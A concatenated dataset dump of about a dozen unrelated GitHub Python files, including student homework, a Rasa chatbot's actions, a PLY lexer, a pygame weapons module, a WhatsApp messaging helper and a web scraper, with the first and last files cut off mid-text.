spaceXInsurance\n spaceXCost = ((satellite_mass * spaceXCharge) + spaceInsurance)\n\n #print results\n if ulaCost < spaceXCost:\n savings = spaceXCost - ulaCost\n print('United Launch Alliance will save you $',format(savings, ',.2f'), \\\n ' on this launch.', sep = '')\n elif spaceXCost < ulaCost:\n savings = ulaCost - spaceXCost\n print('SpaceX will save you $',format(savings, ',.2f'),' on this launch.', sep = '')\n else:\n print('Both providers cost the same amount')\n\n #choice number 3\n elif choice == 3:\n travel_distance = float(input('Enter travel distance in light years: '))\n while travel_distance < 1 and travel_distance > 0:\n travel_distance = float(input('Enter travel distance in light years: '))\n ship_velocity = float(input('Enter space ship velocity as a fraction of ' \\\n 'the speed of light: '))\n while ship_velocity < 0.1 or ship_velocity == 1.0 or ship_velocity > 1.0:\n ship_velocity = float(input('Enter space ship velocity as a fraction of ' \\\n 'the speed of light: '))\n\n #calculate time dilation on earth\n distance = travel_distance * lightYear\n speed = ship_velocity * speed_of_light\n time = distance / speed\n time = time / secondsDay\n\n #calculate time dilation on ship\n shipTime = (distance / speed) // secondsDay\n time_dilation = (math.sqrt(1 - ((speed ** 2) / (speed_of_light ** 2)))) * shipTime\n\n #print results\n time = format(time, ',.0f')\n time = int(time)\n if time >= 365:\n years = time // 365\n days = time - 365\n print('An observer on Earth ages',years,'years,',days,'days during the trip')\n else:\n print('An observer on Earth ages',time,'days during the trip')\n\n if time_dilation >= 365:\n shipYears = time_dilation // 365\n shipDays = time_dilation - 365\n print('A passenger on the ship ages',shipYears,'years,',shipDays,'days during the trip')\n else:\n time_dilation = math.floor(time_dilation)\n print('A passenger on the ship ages',time_dilation,'days during the trip')\n print()\n\nprint('Goodbye')\n\n \n\n\n \n\n \n","repo_name":"Pengyuuu/CECS-174","sub_path":"Homework/Homework 1/TruongHW1.py","file_name":"TruongHW1.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21879129973","text":"'''\nAndrea Sheets\n2020_9_21\nMyUtilies\nDie Roller\n'''\n\nimport random\nimport os\n\ndef DieRoller(times, sides):\n # rolls any amount of dice (times) with any amount of sides (sides) and returns the sum of all die rolled, using an accumulator (total)\n total = 0\n for i in range(times):\n roll = random.randint(1, sides)\n total += roll\n print(roll) #Had this for testing purposes - can comment back in to see the numbers rolled for each iteration\n return total\n\ndef TargetRoller(times, sides, target):\n # rolls any amount of dice (times) with any amount of sides (sides) and returns how many times a roll was either equal to or greater than a target number (target)\n total = 0\n for i in range(times):\n roll = random.randint(1, sides)\n print(roll) #Had this for testing purposes = can comment back in to see the numbers rolled for each iteration\n if roll >= target:\n total += 1\n return total\n\n\n ","repo_name":"NicciSheets/Game_0_aka_Dice_Roller","sub_path":"MyUtilities.py","file_name":"MyUtilities.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39798987438","text":"\"\"\"Settings for pelican.\"\"\"\n\n# This can also be the absolute path to a theme that you downloaded\n# i.e. './themes/anothertheme/'\nTHEME = 'notmyidea'\n\n# The folder ``images`` should be copied into the folder ``static`` when\n# generating the output.\nSTATIC_PATHS = ['images', ]\n\n# See http://pelican.notmyidea.org/en/latest/settings.html#timezone\nTIMEZONE = 'UTC'\n\n# Pelican will take the ``Date`` metadata and put the articles into folders\n# like ``/posts/2012/02/`` when generating the output.\nARTICLE_PERMALINK_STRUCTURE = '/%Y/%m/'\n\n# I like to put everything into the category ``Blog``, which also appears on\n# the main menu. Tags will not appear on the menu.\nDEFAULT_CATEGORY = 'Blog'\n\nAUTHOR = 'Nhan C'\nSITENAME = 'nhanc.github.io'\nSITEURL = \"http://nhanc.github.io\"\n\n# I like to have ``Archives`` in the main menu.\nMENUITEMS = (\n ('Archives', '{0}/archives.html'.format(SITEURL)),\n)\n\n\nWITH_PAGINATION = True\nDEFAULT_PAGINATION = 10\nREVERSE_ARCHIVE_ORDER = True\n\n# Uncomment what ever you want to use\n#GOOGLE_ANALYTICS = 'XX-XXXXXXX-XX'\n#DISQUS_SITENAME = 'yourdisqushandle'\n#GITHUB_URL = 'http://github.com/username/username.github.com'\n#TWITTER_USERNAME = 'username'\n","repo_name":"nhanc/nhanc.github.io","sub_path":"source/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16951464369","text":"from typing import Any, Text, Dict, List\nfrom rasa_sdk.events import AllSlotsReset,SlotSet\nfrom rasa_sdk import Action, Tracker,events,FormValidationAction\nfrom rasa_sdk.executor import CollectingDispatcher\nfrom typing import Dict, Text, Any, List, Union, Optional\nimport json\nfrom rasa_sdk.types import DomainDict\nimport re\nimport requests\n\n\n## Below is the action for reseting all slots which are previously filled.\n\nclass ActionAllSlotReset(Action):\n\n def name(self) -> Text:\n return \"action_all_slot_reset\"\n\n def run(self, dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n\n return [AllSlotsReset()]\n\n## Below action validate that the entered country for checking capital is available in country list or not if country is not available in country list then it shows the alert message.\n\nclass ValidateCapitalForm(FormValidationAction):\n def name(self) -> Text:\n return \"validate_capital_form\"\n\n def validate_countryname(self, value: Text, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any]) -> Optional[Text]:\n \tcountr_name = tracker.get_slot('countryname')\n \tURL ='https://qcooc59re3.execute-api.us-east-1.amazonaws.com/dev/getCountries'\n \tcountr_name = tracker.get_slot('countryname')\n \tresp_check_countries = requests.get(url=URL)\n \tcheck_countries = resp_check_countries.json()\n \tcheck_cntr_list = check_countries[\"body\"]\n \tif (countr_name in check_cntr_list):\n \t\treturn {\"countryname\" : value}\n \telse :\n \t\tdispatcher.utter_message(text=\"It seems that you have entered wrong country name\")\n \t\treturn{\"countryname\" : None}\n\n## Below action validate that the entered country for checking population is available in country list or not if country is not available in country list then it shows the alert message.\n\nclass ValidatePopulationForm(FormValidationAction):\n def name(self) -> Text:\n return \"validate_population_form\"\n\n def validate_countryname(self, value: Text, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any]) -> Optional[Text]:\n \tURL ='https://qcooc59re3.execute-api.us-east-1.amazonaws.com/dev/getCountries'\n \tcountry_name = tracker.get_slot('countryname')\n \tresp_check_country = requests.get(url=URL)\n \tcheck_country = resp_check_country.json()\n \tcheck_country_list = check_country[\"body\"]\n \tif (country_name in check_country_list):\n \t\treturn {\"countryname\" : value}\n \telse :\n \t\tdispatcher.utter_message(text=\"It seems that you have entered wrong country name\")\n \t\treturn{\"countryname\" : None}\n\n \n## Action for gettting country list and setting the country list to the countries slot.\n\nclass ActionGetCountries(Action):\n\n def name(self) -> Text:\n return \"action_get_countries\"\n\n def run(self, dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n \tURL = 'https://qcooc59re3.execute-api.us-east-1.amazonaws.com/dev/getCountries'\n\n \tresponse_countries = requests.get(url=URL)\n\n \tcountries_data = response_countries.json()\n\n \tcountries_list = countries_data[\"body\"]\n \t\n \treturn [SlotSet('countries',countries_list)]\n\n## Action for fetching the capital of entered country\n\nclass ActionGetCapital(Action):\n\n def name(self) -> Text:\n return \"action_know_capital\"\n\n def run(self, dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n \t url = 'https://qcooc59re3.execute-api.us-east-1.amazonaws.com/dev/getCapital'\n \t capital_countryname = tracker.get_slot('countryname')\n \t payload = {'country': capital_countryname}\n \t headers = {'content-type': 'application/json'}\n \t response_capital = requests.post(url, data= json.dumps(payload), headers=headers)\n \t capital_json = response_capital.json()\n \t if capital_json[\"success\"] ==1 :\n \t \tcountryOne = capital_json[\"body\"][\"country\"]\n \t \tcapital = capital_json[\"body\"][\"capital\"]\n \t \tdispatcher.utter_message(text =\"Capital of\"+\" \"+countryOne+\" \"+\"is\"+\" \"+capital+\" \"+\".\")\n \t else :\n \t \tdispatcher.utter_message(text=\"Sorry we wont be able to found population for\"+population_countryname+ \" \"+\"country\")\n \t return []\n\n## Action for checking the population of country\n\nclass ActionGetPopulation(Action):\n\n def name(self) -> Text:\n return \"action_know_population\"\n\n def run(self, dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n \t url = 'https://qcooc59re3.execute-api.us-east-1.amazonaws.com/dev/getPopulation'\n \t population_countryname = tracker.get_slot('countryname')\n \t payload = {'country': population_countryname}\n \t headers = {'content-type': 'application/json'}\n \t response_population = requests.post(url, data= json.dumps(payload),headers=headers)\n \t population_json = response_population.json()\n \t if population_json[\"success\"] ==1 :\n \t \tcountryTwo = population_json[\"body\"][\"country\"]\n \t \tpopulation = population_json[\"body\"][\"population\"]\n \t \tdispatcher.utter_message(text=\"Population of\"+\" \"+countryTwo+\" \"+\"is\" +\" \"+population +\" \"+\".\")\n \t else:\n \t \tdispatcher.utter_message(text =\"Sorry we wont be able to found population for\"+population_countryname+ \" \"+\"country\")\n \t return []\n\n\n","repo_name":"shivanigaigole/ChatbotAssignment","sub_path":"actions/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":5525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5868699274","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def recoverTree(self, root: Optional[TreeNode]) -> None:\n \"\"\"\n Do not return anything, modify root in-place instead.\n \"\"\"\n nums = []\n\n # print(\"type of root\",type(root))\n def inorder(root):\n if root is None:\n return None\n\n inorder(root.left)\n nums.append(root)\n inorder(root.right)\n\n inorder(root)\n snums = sorted(nums, key=lambda x: x.val)\n n = len(nums)\n for i in range(n):\n if nums[i].val != snums[i].val:\n nums[i].val, snums[i].val = snums[i].val, nums[i].val\n break\n\n return root\n\n","repo_name":"vramanrs/Leetcode-python","sub_path":"recover-binary-search-tree.py","file_name":"recover-binary-search-tree.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34957657113","text":"def bubble_sort(items):\n\n '''Return array of items, sorted in ascending order'''\n\n count = 0\n\n for i in range(len(items)-1):\n if items[i] > items[i + 1]:\n items[i],items[i + 1] = items[i + 1],items[i]\n count += 1\n\n if count == 0:\n\n return items\n else:\n\n return bubble_sort(items)\n\n\ndef merge_sort(items):\n\n '''Return array of items, sorted in ascending order'''\n\n\n\ndef quick_sort(items):\n\n '''Return array of items, sorted in ascending order'''\n\n if len(items) <= 1:\n return items\n else:\n return quick_sort([i for i in items[1:] if i <= items[0]]) + [items[0]] +\\\n quick_sort([i for i in items[1:] if i > items[0]])\n","repo_name":"jkroman2/testpackage","sub_path":"testpackage/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43874579470","text":"from agents.runners.learners.learner import Learner\n\nimport ray\n\nclass APEXLearner(Learner):\n def __init__(self, algorithm, writer, device, state_dim, action_dim, agent_args, epsilon):\n self.args = agent_args\n self.algorithm = algorithm(writer, device, state_dim, action_dim, agent_args, epsilon).to(device)\n def run(self, ps, buffer):\n data = ray.get(buffer.sample.remote(self.args['learner_batch_size']))\n idx, td_error = self.algorithm.train_network(data)\n ray.wait([ps.push.remote(self.get_weights())])\n ray.wait([buffer.put_idxs.remote([idx, td_error])])","repo_name":"seolhokim/DistributedRL-Pytorch-Ray","sub_path":"agents/runners/learners/apex_learner.py","file_name":"apex_learner.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"61"} +{"seq_id":"40455909584","text":"import ply.lex as lex\n\n\nclass Lexer:\n\n def __init__(self, data, provenance):\n self.provenance = provenance\n self.data = data\n self.lexer = lex.lex(module=self)\n # Reset the lexer and store a new input string.\n self.lexer.input(self.data)\n self.iseof = False\n\n\n reserved = {\n 'print': 'PRINT',\n 'main': 'MAIN',\n 'def': 'DEF',\n 'var': 'VAR',\n 'int': 'INT'\n }\n\n # all possible token names that can be produced by the lexer\n tokens = ('PLUS',\n 'MINUS',\n 'UMINUS',\n 'TIMES',\n 'DIV',\n 'MODULUS',\n 'BITOR',\n 'BITAND',\n 'BITXOR',\n 'BITSHL',\n 'BITSHR',\n 'BITCOMPL',\n 'EQ',\n 'EOF',\n 'SEMICOLON',\n 'COLON',\n 'LPAREN',\n 'RPAREN',\n 'IDENT',\n 'NUMBER',\n 'LBRACE',\n 'RBRACE') + tuple(reserved.values())\n\n # Regular expression rules for tokens above\n t_LPAREN = r'\\('\n t_RPAREN = r'\\)'\n\n t_PLUS = r'\\+'\n t_MINUS = '-'\n t_UMINUS = '-'\n t_TIMES = r'\\*'\n t_DIV = r'/'\n t_MODULUS = r'%'\n t_BITOR = r'\\|'\n t_BITAND = '&'\n t_BITXOR = r'\\^'\n t_BITSHL = '<<'\n t_BITSHR = '>>'\n t_BITCOMPL = '~'\n\n t_SEMICOLON = ';'\n t_COLON = ':'\n t_EQ = '='\n t_LBRACE = '{'\n t_RBRACE = '}'\n\n def t_IDENT(self, t):\n r'[A-Za-z_][A-Za-z0-9_]*'\n t.type = Lexer.reserved.get(t.value, 'IDENT')\n return t\n\n # regexp rule that matches numbers & converts string into int\n def t_NUMBER(self, t):\n r'\\d+'\n t.value = int(t.value)\n if 0 <= t.value < 9223372036854775808:\n return t\n self.error(t, f'Integer with value {t.value} must be in [0, 2^63)')\n\n # no return value (token discarded)\n def t_COMMENT(self,t):\n r'//.*\\n?'\n pass\n\n # handle an end-of-file condition in the input\n def t_eof(self, t):\n if not self.iseof:\n self.iseof = True\n t.type = 'EOF'\n return t\n\n # compute column\n def find_column(self, t):\n line_start = self.data.rfind('\\n', 0, t.lexpos) + 1\n return f'{self.provenance}:{t.lineno}.{t.lexpos - line_start + 1}'\n\n def error(self, t, msg):\n print(f'{self.find_column(t)}:Error:{msg}')\n raise SyntaxError(msg)\n\n # handleillegalcharactersintheinput.\n def t_error(self, t):\n self.error(t, f\"Illegal character '{t.value[0]}'\")\n\n # rule to track line numbers\n def t_newline(self, t):\n r'\\n'\n t.lexer.lineno += 1\n\n def t_whitespace(self, t):\n r'//.*\\n?'\n if t.value[-1] == '\\n':\n t.lexer.lineno += 1\n # returns nothing\n\n # string containing ignored characters (spaces and tabs)\n t_ignore = ' \\t\\f\\v'\n","repo_name":"daryatodoskova/cse302labs","sub_path":"2/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35189954887","text":"'''\nClimbing Staris:\nYou are climbing a staircase. It takes n steps to reach the top.\n\nEach time you can either climb 1 or 2 steps. In how many distinct ways can you climb to the top?\n\nExample 1:\n\nInput: n = 2\nOutput: 2\nExplanation: There are two ways to climb to the top.\n1. 1 step + 1 step\n2. 2 steps\nExample 2:\n\nInput: n = 3\nOutput: 3\nExplanation: There are three ways to climb to the top.\n1. 1 step + 1 step + 1 step\n2. 1 step + 2 steps\n3. 2 steps + 1 step\n'''\n\n# Brute Force Solution\nclass Solution:\n def climbStairs(self, n: int) -> int:\n def countClimbStairs(i, n):\n if i > n:\n return 0\n if i == n:\n return 1\n \n return countClimbStairs(i+1, n) + countClimbStairs(i+2, n)\n \n return countClimbStairs(0, n)\n\nclass Solution:\n def climbStairs(self, n: int) -> int:\n lPoint, rPoint = 0, 1\n for i in range(n+1):\n temp = lPoint\n lPoint = lPoint + rPoint\n rPoint = temp\n return lPoint\n\n\nclass Solution:\n def climbStairs(self, n: int) -> int:\n c1 = 1\n c2 = 1\n for i in range(n-1):\n next = c1 + c2\n c1= c2\n c2 = next\n return c2\n\n\n\n \n ","repo_name":"sushant097/Data-Structure-Algorithms-Collections-Python","sub_path":"coding_solutions/interview_related/[DP]ClimbingStairs.py","file_name":"[DP]ClimbingStairs.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6556564488","text":"#class\nclass Person:\n def walk(self):#instance keyword\n print('person is walking')\n def read(self):\n print(\"person is reading\")\n#object creation->Person(),reference pe1\npe1=Person()\npe1.walk()\npe1.read()\n#object2\npe2=Person()\npe2.walk()\npe2.read()","repo_name":"silpaps/mypython","sub_path":"OOPS/creating_class_object.py","file_name":"creating_class_object.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23554817181","text":"def boilerplate(filename):\n with open(filename, 'r') as infi:\n with open('output-'+filename, 'w') as outfi:\n numcases = infi.readline().strip()\n numcases = int(numcases)\n for i in range(numcases):\n case = infi.readline().strip()\n outfi.write(f(i, case)+'\\n')\n\ndef tester(x):\n return f(x, x)\n\ndef tidynumbers(casenumber, inp):\n def helper(x):\n x = str(x)\n if x == '0':\n return '0'\n biggest, bigindex = 0, -1\n sofar = '0'\n for i in range(len(x)):\n if int(x[i]) < biggest:\n sofar = helper(int(sofar) - 1)\n sofar += '9' * (len(x) - i)\n return sofar\n else:\n sofar += x[i]\n biggest, bigindex = int(x[i]), i\n return sofar\n\n return 'Case #%s: %s' % (casenumber+1, int(helper(inp)))\n\n\nf = tidynumbers\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/2175.py","file_name":"2175.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37429175315","text":"\"\"\"\nThis module implements all sort of things related to weapons. There are simple\nweapons, guns and bullets. There are variations of them for enemys, but the main\nidea remains the same for all the clases.\n\"\"\"\nfrom utils import load_image\nfrom settings import SHOOT_SOUND\n\nimport pygame\n\nimport math\nfrom types import FunctionType\n\nclass Weapon(pygame.sprite.Sprite):\n \"\"\"\n Class representing a generic weapon in the game. This class is responsible\n for implementing the weapon rotation based on the target position.\n\n Parameters\n ----------\n image_path: tuple\n The path leading to the weapon image\n target_pos: tuple\n The initial position to target.\n \"\"\"\n def __init__(self, image_path: tuple, target_pos: tuple):\n super().__init__()\n self._target_pos = target_pos\n self.image = load_image(image_path, 3)\n self.image_left = pygame.transform.flip(self.image, False, True)\n self.orig_image = self.image\n self.inventory_image = self.image\n self.rect = self.image.get_rect()\n self.facing_r = True\n self.angle_radians = 0\n self.angle_degrees = 0\n self._entity = None\n\n @property\n def entity(self):\n \"\"\"\n The entity associated with the weapon. The weapon will orbit this entity.\n \"\"\"\n return self._entity\n\n @entity.setter\n def entity(self, entity):\n self._entity = entity\n self.rect.center = self._entity.rect.center\n\n self.entity_image_rigth = self._entity.image\n self.entity_image_left = pygame.transform.flip(self._entity.image, True, False)\n\n def update_target_position(self, target_pos: tuple):\n \"\"\"\n Updates the position that the weapon should target.\n\n Parameters\n ----------\n target_pos:\n The new position to target.\n\n Returns\n -------\n None\n \"\"\"\n self._target_pos = target_pos\n\n def _get_angles(self):\n self.angle_radians = math.atan2(self.entity.rect.centery-self._target_pos[1], self._target_pos[0]-self.entity.rect.centerx)\n self.angle_degrees = math.degrees(self.angle_radians)\n\n def _rotate(self):\n\n self.rect = self.image.get_rect(\n center = (math.cos(-self.angle_radians) * 65 + self.entity.rect.centerx,\n math.sin(-self.angle_radians) * 80 + self.entity.rect.centery)\n )\n\n if -self.angle_degrees >= 90 or -self.angle_degrees <= -90:\n self.image = pygame.transform.rotate(self.image_left, self.angle_degrees)\n self.entity.image = self.entity_image_left\n self.facing_r = False\n \n else:\n self.image = pygame.transform.rotate(self.orig_image, self.angle_degrees)\n self.entity.image = self.entity_image_rigth\n self.facing_r = True\n\n def update(self):\n \"\"\"\n Updates the weapon. In this basic weapon, it just rotates it acordingly\n to the target.\n\n Returns\n -------\n None\n \"\"\"\n self._get_angles()\n self._rotate()\n\nclass EnemyWeapon(Weapon):\n \"\"\"\n Class representing an enemy's weapon. It changes the rotation implementation\n so it doesn't flip the enemy's image.\n\n Parameters\n ----------\n image_path: tuple\n The path leading to the weapon image\n target_pos:\n The initial position to target.\n \"\"\"\n def _rotate(self):\n self.image = pygame.transform.rotate(self.orig_image, self.angle_degrees)\n\n self.rect = self.image.get_rect(\n center = (math.cos(-self.angle_radians) * 50 + self.entity.rect.centerx,\n math.sin(-self.angle_radians) * 60 + self.entity.rect.centery)\n )\n\n if -self.angle_degrees >= 90 or -self.angle_degrees <= -90:\n if self.facing_r:\n self.orig_image = pygame.transform.flip(self.orig_image, False, True)\n self.entity.image = self.entity.image_right\n self.facing_r = False\n\n elif not self.facing_r:\n self.orig_image = pygame.transform.flip(self.orig_image, False, True)\n self.entity.image = self.entity.image_left\n self.facing_r = True\n\nclass Gun(Weapon):\n \"\"\"\n Class representing a gun. A gun implements the same thing as weapons, with\n the addition of the capability of shooting. All the gun peculiaritys, like\n bullet damage and speed, are set with the dict `stats`.\n\n Parameters\n ----------\n image_path: tuple\n The path leading to the weapon image\n target_pos: tuple\n The initial position to target.\n stats: dict\n A dicitionary containing the gun stats.\n \"\"\"\n def __init__(self, image_path, target_pos, stats):\n super().__init__(image_path, target_pos)\n self.move_function = stats[\"move_function\"]\n self.damage = stats[\"damage\"]\n self.mag_size = stats[\"mag_size\"]\n self.reload_cooldown = stats[\"reload_cooldown\"]\n self.bullet_speed = stats[\"bullet_speed\"]\n self.bullet_sprite = stats[\"bullet_sprite\"]\n\n self.bullet_group = pygame.sprite.Group()\n\n self.shooting = False\n self.reloading = False\n\n self.mag_count = self.mag_size\n self.time_empty_mag = 0\n self.time_last_reload = 0\n self.time_now = 0\n\n def shoot(self):\n \"\"\"\n Make the gun shoot. This will create bullets and store them in the\n `bullet_group`. If the gun is in cooldown, it'll do nothing. If a shoot\n is still occuring, it'll do nothing too.\n\n Returns\n -------\n None\n \"\"\"\n if not self.shooting:\n self.shooting = True\n self._shoot()\n\n def _shoot(self):\n if self.mag_count > 0:\n self.shooting = True\n self.mag_count -= 1\n bullet = Bullet(\n self.bullet_sprite,\n (self.rect.centerx, self.rect.centery),\n self.angle_radians,\n self.damage,\n self.move_function,\n self.bullet_speed\n )\n self.bullet_group.add(bullet)\n if self.mag_count == 0:\n self.shooting = False\n self.time_empty_mag = self.time_now\n SHOOT_SOUND.play()\n\n def _reload(self):\n self.mag_count = self.mag_size\n self.reloading = False\n\n def update(self):\n \"\"\"\n Updates the weapon. Besides rotating the weapon, this method also will\n call tue update method to the gun active bullets.\n\n Returns\n -------\n None\n \"\"\"\n super().update()\n self.time_now = pygame.time.get_ticks()\n\n if self.mag_count == 0:\n if self.time_now - self.time_empty_mag > self.reload_cooldown:\n self.reloading = True\n\n if self.reloading:\n self._reload()\n if self.shooting:\n self._shoot()\n self.bullet_group.update()\n\nclass EnemyGun(EnemyWeapon, Gun):\n pass\n\nclass Bullet(pygame.sprite.Sprite):\n \"\"\"\n Class representing a bullet. The class is the same for enemies and the\n player. The bullets needs some parameters, including the trajectory function,\n to determine damages and such. What should be used to diferentiate from\n where the bullet comes from is the group it is contained.\n\n Parameters\n ----------\n image_path: tuple\n The path to the bullet image.\n position: tuple\n The initial position of the bullet.\n angle_radians: float\n The angle that the bullet is being shoot.\n damage: int\n The damage the bullet should.\n move_function: function\n A function to determine the bullet trajectory. This function should take\n one variable (the time elapsed since the bullet was shoot) and should\n return only a float or int.\n speed: int\n The speed of the bullet\n \"\"\"\n def __init__(self, image_path: tuple, position: tuple, angle_radians: float, damage: int, move_function: FunctionType, speed: int):\n pygame.sprite.Sprite.__init__(self)\n self.image = load_image(image_path)\n self.orig_image = self.image\n self.rect = self.image.get_rect()\n self.rect.center = position\n self.damage = damage\n self.dx = 50\n self.dy = 0\n self.x = position[0]\n self.y = position[1]\n self.angle_r = -angle_radians\n self.image = pygame.transform.rotate(\n self.orig_image,\n math.degrees(angle_radians)\n )\n self.travel_time = 0\n self.function = move_function\n self.speed = speed\n\n def update(self):\n \"\"\"\n Updates the bullet. This will make it go futher, acordingly to the\n trajectory function passed. This ins't made for being called alone, but\n to be called when the bullet group is being updated.\n\n Returns\n -------\n None\n \"\"\"\n self.new_x = self.dx * math.cos(self.angle_r) - self.dy * math.sin(self.angle_r) + self.x\n self.new_y = self.dx * math.sin(self.angle_r) + self.dy * math.cos(self.angle_r) + self.y\n self.rect.centerx = self.new_x\n self.rect.centery = self.new_y\n \n wave = self.function(self.travel_time)\n self.travel_time += 0.5\n self.dx += self.speed\n self.dy += wave\n\n if self.travel_time > 100:\n self.kill()\n","repo_name":"vito0182/trabalho-lp-a2","sub_path":"src/weapons.py","file_name":"weapons.py","file_ext":"py","file_size_in_byte":9479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23416621121","text":"import sys, string\r\n\r\ndef magician(row1, row2):\r\n s1 = set(row1)\r\n s2 = set(row2)\r\n s = s1 & s2\r\n if len(s) > 1:\r\n return \"Bad magician!\"\r\n if len(s) == 0:\r\n return \"Volunteer cheated!\"\r\n return s.pop()\r\n\r\ndef main(args):\r\n f = file(args[1])\r\n ncases = int(f.readline())\r\n for i in range(ncases):\r\n line = f.readline()\r\n line = line.rstrip()\r\n nrow = int(line)\r\n for j in range(4):\r\n line = f.readline()\r\n if j+1 == nrow:\r\n line = line.rstrip()\r\n row1 = map(int, line.split(\" \"))\r\n line = f.readline()\r\n line = line.rstrip()\r\n nrow = int(line)\r\n for j in range(4):\r\n line = f.readline()\r\n if j+1 == nrow:\r\n line = line.rstrip()\r\n row2 = map(int, line.split(\" \"))\r\n ans = magician(row1, row2)\r\n sys.stdout.write(\"Case #%d: %s\\n\" % (i+1, ans))\r\n\r\nif __name__ == \"__main__\":\r\n main(sys.argv)","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/3393.py","file_name":"3393.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20704173075","text":"import requests\n\nclass SendMessage:\n def __init__(self,phone:str,id_whats:str ,acces_token: str) -> None:\n self.head = {\n \"Authorization\":f\"Bearer {acces_token}\"\n }\n self.url = f\"https://graph.facebook.com/v14.0/{id_whats}/messages/\"\n self.phone = phone\n\n\n def template(self,json_components: dict):\n json_template = {\n \"messaging_product\": \"whatsapp\",\n \"to\": f\"51{self.phone}\",\n \"type\": \"template\",\n \"template\": json_components\n }\n return requests.post(self.url, headers=self.head, json=json_template).json()\n \n def message_text(self,text:str):\n json_message ={\n 'messaging_product': 'whatsapp',\n 'to':f\"51{self.phone}\",\n 'type':'text',\n 'text':{\"body\":text} \n }\n return requests.post(self.url, headers=self.head, json=json_message).json()\n \n","repo_name":"digitaliatec/send_notification","sub_path":"whatsapp_api/notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31832089630","text":"import json\nimport aiohttp\nimport asyncio\nfrom geopy.geocoders import Nominatim\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_location(address):\n geolocator = Nominatim(user_agent=\"my_request\")\n location = geolocator.geocode(address)\n try:\n lat = location.latitude\n long = location.longitude\n if lat and long:\n return lat, long\n except: AttributeError(f'{address} not found')\n return None\n\n\ndef get_info():\n response_from_main_page = requests.get(\n 'https://oriencoop.cl/sucursales.htm'\n )\n data = response_from_main_page.text\n soup = BeautifulSoup(data, 'lxml')\n common_phones = [\n phone.text for phone in soup.find(\n 'div', class_='b-call shadow'\n ).findAll('a', href=True) if phone.text\n ]\n c_list_accordion_class = soup.findAll('ul', class_='sub-menu')\n list_of_ul = []\n for i in c_list_accordion_class:\n list_of_ul.append(i.findAllNext('a', href=True))\n list_of_branches = [\n a['href'][12:] for a in list_of_ul[0] if '/sucursales/' in a['href']\n ]\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n task = loop.create_task(main(list_of_branches, common_phones))\n async_result = loop.run_until_complete(task)\n return async_result\n\n\nasync def create_one_task(session, branch, common_phones):\n async with session.get(\n f'https://oriencoop.cl/sucursales/{int(branch)}', ssl=False\n ) as response_from_branch:\n data_branch = response_from_branch\n soup_branch = BeautifulSoup(await data_branch.text(), 'lxml')\n s_dato_info = soup_branch.find('div', class_=\"s-dato\").findAll('span')\n address = s_dato_info[0].text\n branch_phone = [s_dato_info[1].text]\n for common_phone in common_phones:\n branch_phone.append(common_phone)\n working_hours = s_dato_info[3].text[1:], s_dato_info[4].text.strip()\n name = [img['alt'] for img in soup_branch.find(\n 'div', class_='b-logo'\n ).find_all('img', alt=True)][0]\n location = get_location(address)\n data = {\n 'address': address,\n 'latlon': location,\n 'name': name,\n 'phones': branch_phone,\n 'working_hours': working_hours\n }\n return data\n\n\nasync def get_all_tasks(session, list_of_branches, common_phones):\n tasks = []\n for branch in list_of_branches:\n task = asyncio.create_task(\n create_one_task(session, branch, common_phones)\n )\n tasks.append(task)\n results = await asyncio.gather(*tasks)\n return results\n\n\nasync def main(list_of_branches, common_phones):\n async with aiohttp.ClientSession(trust_env=True) as session:\n response = await get_all_tasks(\n session, list_of_branches, common_phones\n )\n json_data = json.dumps(response, ensure_ascii=False)\n with open('sucursales_branches.json', 